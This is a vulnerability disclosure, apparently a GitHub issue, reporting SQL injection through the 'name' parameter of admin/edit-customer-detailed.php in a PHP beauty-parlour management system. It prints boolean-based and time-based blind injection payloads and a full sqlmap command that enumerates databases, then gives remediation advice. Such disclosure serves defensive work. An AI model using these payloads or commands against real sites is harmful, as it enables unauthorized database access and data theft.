### ISSUE TITLE
1000projects Beauty Parlour Management System PHP SQLite Project V1.0 admin/edit-customer-detailed.php SQL injection

### ISSUE THREAD

**Issue by Hacker0xone** [Hacker0xone/CVE#17]
# 1000projects Beauty Parlour Management System PHP SQLite Project V1.0 admin/edit-customer-detailed.php SQL injection
## NAME OF AFFECTED PRODUCT(S)
+ Beauty Parlour Management System PHP SQLite Project
## Vendor Homepage
+ https://1000projects.org/beauty-parlour-management-system-php-sqlite-project.html
## submitter
+ Hacker0xOne
## Vulnerable File
+ admin/edit-customer-detailed.php
## VERSION(S)
+ V1.0
## Software Link
+ https://1000projects.org/wp-content/uploads/2023/01/Beauty-Parlour-Management-System.7z
PROBLEM TYPE
# Vulnerability Type
+ SQL injection
## Root Cause
+ A SQL injection vulnerability was found in the 'admin/edit-customer-detailed.php' file of the 'Beauty Parlour Management System PHP SQLite Project' project. The reason for this issue is that attackers inject malicious code from the parameter 'name' and use it directly in SQL queries without the need for appropriate cleaning or validation. This allows attackers to forge input values, thereby manipulating SQL queries and performing unauthorized operations.
## Impact
+ Attackers can exploit this SQL injection vulnerability to achieve unauthorized database access, sensitive data leakage, data tampering, comprehensive system control, and even service interruption, posing a serious threat to system security and business continuity.
## DESCRIPTION
+ During the security review of "Beauty Parlour Management System PHP SQLite Project", Hacker0xOne discovered a critical SQL injection vulnerability in the "admin/edit-customer-detailed.php" file. This vulnerability stems from insufficient user input validation of the 'name' parameter, allowing attackers to inject malicious SQL queries. Therefore, attackers can gain unauthorized access to databases, modify or delete data, and access sensitive information. Immediate remedial measures are needed to ensure system security and protect data integrity.
## Vulnerability lonameion:
+ 'name' parameter
```
Payload:
    Parameter: name (POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)
    Payload: name=Sunita Verma1' WHERE 8004=8004 AND 4463=(SELECT (CASE WHEN (4463=4463) THEN 4463 ELSE (SELECT 6336 UNION SELECT 4643) END))-- -&email=1verma@gmail.com&mobilenum=5546464646&gender=Male&details=Taking Hair Spa111&submit=

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: name=Sunita Verma1' WHERE 3600=3600 AND (SELECT 6712 FROM (SELECT(SLEEP(5)))wJLW)-- NENO&email=1verma@gmail.com&mobilenum=5546464646&gender=Male&details=Taking Hair Spa111&submit=
```

## The following are screenshots of some specific information obtained from testing and running with the sqlmap tool:
```   
 sqlmap -u "http://10.211.55.6:1112/admin/edit-customer-detailed.php?editid=1" --data="name=Sunita+Verma1&email=1verma%40gmail.com&mobilenum=5546464646&gender=Male&details=Taking+Hair+Spa111&submit=" --cookie="PHPSESSID=590ushp8n3aqabqpe4p1cpmeov" --batch --level=5 --risk=3 --dbms=mysql --dbs --random-agent
```

+ <img width="590" alt="image" src="https://github.com/user-attachments/assets/a099ab58-b9b7-4663-845f-8443dc91f238">

# Suggested repair
+ Use prepared statements and parameter binding:
Preparing statements can prevent SQL injection as they separate SQL code from user input data. When using prepare statements, the value entered by the user is treated as pure data and will not be interpreted as SQL code.

+ Input validation and filtering:
Strictly validate and filter user input data to ensure it conforms to the expected format.

+ Minimize database user permissions:
Ensure that the account used to connect to the database has the minimum necessary permissions. Avoid using accounts with advanced permissions (such as' root 'or' admin ') for daily operations.

+ Regular security audits:
Regularly conduct code and system security audits to promptly identify and fix potential security vulnerabilities.
